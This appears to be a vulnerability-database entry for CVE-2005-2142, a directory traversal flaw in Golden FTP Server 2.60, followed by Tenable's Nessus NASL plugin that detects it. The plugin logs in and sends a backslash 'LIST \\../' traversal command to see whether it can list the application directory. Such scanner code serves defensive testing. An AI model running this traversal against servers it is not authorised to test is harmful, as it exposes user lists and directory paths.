Vulnerabilities > CVE-2005-2142 - Directory Traversal vulnerability in Kmint21 Software Golden FTP Server 2.60

047910
CVSS 2.1 - LOW
Attack vector
LOCAL
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
local
low complexity
kmint21-software
nessus

Summary

Directory traversal vulnerability in Golden FTP Server 2.60 allows remote authenticated attackers to list arbitrary directories via a "\.." (backslash dot dot) in an LS (LIST) command.

Vulnerable Configurations

Part Description Count
Application
Kmint21_Software
1

Nessus

NASL familyFTP
NASL idGOLDEN_FTP_SERVER_LS_DIR_TRAVERSAL.NASL
descriptionThe version of Golden FTP Server installed on the remote host is prone to multiple information disclosure vulnerabilities. Specifically, an authenticated attacker can list the contents of the application directory, which provides a list of valid users, and learn the absolute path of any shared directories.
last seen2020-06-01
modified2020-06-02
plugin id18615
published2005-07-05
reporterThis script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/18615
titleGolden FTP Server <= 2.60 LS Command Traversal Information Disclosure
code
#TRUSTED a0d9cd9a5f335d29a84af2ec44baeeb32754d6c5fedd215fd64e496432559ef6bac113f0a61f013590448d08dde8fca668820a3fa287c6768a5838611932b9e3919f95245321190cac91fae7ff8a7cab35163dbf3e03e178164dfdd96b03c8568d93f6080739952fba327c58952129fdea9945040cdccb111cac485765f7f06d1541f5ece86ef85d294572b6afc4fd3372fe2fcdcc1cd45e2d46a418c69a659654d5c21da7aab38408a2be13b5daa16a68f69e60bad27d87e0fbb3396eacfdfde9d11de71e8f5a46e56b0a3c09005a494fa9911f1d4c75155833e811a468dc24408d7a085e07f27824c65beffe61446325e4b898b5871c6ceea844c574f8dce4bcf93231dde7911abb7c864ec53ecbc1ff0a6198cf09e292c872f2ccdf59394b903488bfff4d9512289e96f603c7dfbc7bcb50a381d645e021cb6d30c6c6d19b37ba72c9d9c29edc672bd65eb5fcec5cd5bb865223022f7635189e91132bca54e11708c5d4a9e0fd952e9d08d2cd1e94648a69b42448374461c68b293674036d309e7d0209927815f1c1402b8d69a5966f39b960a2b87195a3b17ff35273fcf535ede4c1ebe95e95dec079bbf5cd83e1aa25127adb64f61dee106ab806ab57679188e13534d810222de425aaf42acfca85fc7f442bc84174b47688c48b6a3166d7bcfd5ef0d9c0597a3ab4b203db3dd136b267ee043086e95231e750efb64d8d
###
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if (description) {
  script_id(18615);
  script_version("1.28");

  script_cve_id("CVE-2005-2142");
  script_bugtraq_id(14124);

  script_name(english:"Golden FTP Server <= 2.60 LS Command Traversal Information Disclosure");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote FTP server is affected by information disclosure flaws." );
 script_set_attribute(attribute:"description", value:
"The version of Golden FTP Server installed on the remote host is prone
to multiple information disclosure vulnerabilities.  Specifically, an
authenticated attacker can list the contents of the application
directory, which provides a list of valid users, and learn the
absolute path of any shared directories." );
 script_set_attribute(attribute:"solution", value:
"Upgrade to Golden FTP Server 2.70 or later." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2005-2142");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/07/05");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/07/01");
 script_cvs_date("Date: 2019/02/26  4:50:08");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:kmint21_software:golden_ftp_server");
 script_end_attributes();

 
  script_summary(english:"Checks for information disclosure vulnerabilities in Golden FTP Server <= 2.60");
  script_category(ACT_ATTACK);
  script_family(english:"FTP");
  script_copyright(english:"This script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_dependencies("ftpserver_detect_type_nd_version.nasl", "ftp_overflow.nasl");
  script_require_keys("ftp/login", "ftp/password");
  script_exclude_keys("ftp/msftpd", "ftp/ncftpd", "ftp/fw1ftpd", "ftp/vxftpd");
  script_require_ports("Services/ftp", 21);

  exit(0);
}


include("ftp_func.inc");
include("global_settings.inc");


# nb: to exploit the vulnerability we need to log in.
user = get_kb_item("ftp/login");
pass = get_kb_item("ftp/password");
if (!user || !pass) {
  exit(0, "ftp/login and/or ftp/password are empty");
}


port = get_ftp_port(default: 21);

soc = ftp_open_and_authenticate( user:user, pass:pass, port:port );
if (!soc)
{
  exit(1, "Cannot login on port "+port+" with supplied FTP credentials");
}


# Make sure it's Golden FTP Server.
send(socket:soc, data: 'SYST\r\n');
s = recv_line(socket:soc, length:4096);
if ("215 WIN32" >!< s) exit(0);


port2 = ftp_pasv(socket:soc);
if (!port2) exit(1, 'Cannot get PASV port from control port ', port, '.');
soc2 = open_sock_tcp(port2, transport:ENCAPS_IP);
if (!soc2) exit(1, 'Connection failed to passive port '+port+'.');

# Identify shared directories on the remote.
send(socket:soc, data: 'LIST/\r\n');
s = recv_line(socket:soc, length:4096);
if (s =~ "^1[0-9][0-9] ") {
  listing = ftp_recv_listing(socket:soc2);
  s = recv_line(socket:soc, length:4096);
}
close(soc2);
ndirs = 0;
foreach line (split(listing, keep:FALSE)) {
  if (line =~ "^d") {
    # nb: dirs may have spaces so we can't just use a simple regex.
    dirs[ndirs] = substr(line, 55);

    # 3 directories should be enough for testing.
    if (++ndirs > 3) break;
  }
}


# Try to exploit the vulnerability.
foreach dir (dirs) {
  # Change into the directory.
  c = 'CWD /' + string(dir) + '\r\n';
  send(socket:soc, data:c);
  s = ftp_recv_line(socket:soc);
  if (egrep(string:s, pattern:"^250[ -]")) {
    port2 = ftp_pasv(socket:soc);
    if (!port2) exit(1, 'Cannot get PASV port from control port ', port, '.');
    soc2 = open_sock_tcp(port2, transport:ENCAPS_IP);
    if (!soc2) exit(1, 'Connection failed to passive port '+port+'.');

    # Look for contents of the application directory.
    send(socket:soc, data: 'LIST \\../\r\n');
    s = ftp_recv_line(socket:soc);
    if (egrep(string:s, pattern:"^1[0-9][0-9][ -]")) {
      listing = ftp_recv_listing(socket:soc2);
      s = recv_line(socket:soc, length:4096);

      # There's a problem if we see the .shr file for our username.
      if ( ' ' + string(user) + '.shr' >< listing) {
        security_warning(port);
        break;
      }
    }
    close(soc2);
  }
}


# Close the connections.
ftp_close(socket:soc);